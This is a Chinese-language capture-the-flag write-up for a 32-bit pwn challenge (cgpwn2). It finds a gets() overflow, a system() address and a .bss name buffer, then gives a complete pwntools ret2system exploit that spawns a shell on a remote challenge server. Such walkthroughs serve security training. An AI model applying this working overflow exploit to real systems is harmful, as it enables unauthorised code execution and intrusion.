文件下载地址:
链接:https://pan.baidu.com/s/1MjaJM7ThNQewgIkpFKl3cg
提取码:v4l7
0x01.分析
checksec:
32位程序,仅开启NX。
查看源码:
大概理清一下流程,首先会输出字符串,然后要求输入一个字符串,放到name里面,然后返回的时候,再此要求出入字符串,然后再输出一句话后程序结束。
发现高危函数:gets。继续寻找,是否存在system调用。
果然存在,找到地址:
system的地址为:0x08048420
不过仔细查看一下system的具体调用,发现:
没有/bin/sh,所以我们要替换这个字符串,回到hello()函数,继续观察一些变量:
发现将我们的输入写入name变量,前面没有,所以一定是个全局变量,查看详情:
发现是位于bss段,于是顿时有了思路:
第一次输入先把/bin/sh写入name里面,第二次输入再利用溢出,跳转到system处,将name作为参数,得到shell。
确定一下溢出量:(第二次输入才开始确定偏移量)
0x02.exp
##!/usr/bin/env python
from pwn import*
#r=process('./cgpwn2')
r=remote("111.198.29.45",32269)
system_adr=0x08048420
name_adr=0x0804A080
payload=42*'A'+p32(system_adr)+p32(0x0)+p32(name_adr)
r.recvuntil("please tell me your name")
r.sendline("/bin/sh")
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)
r.interactive()
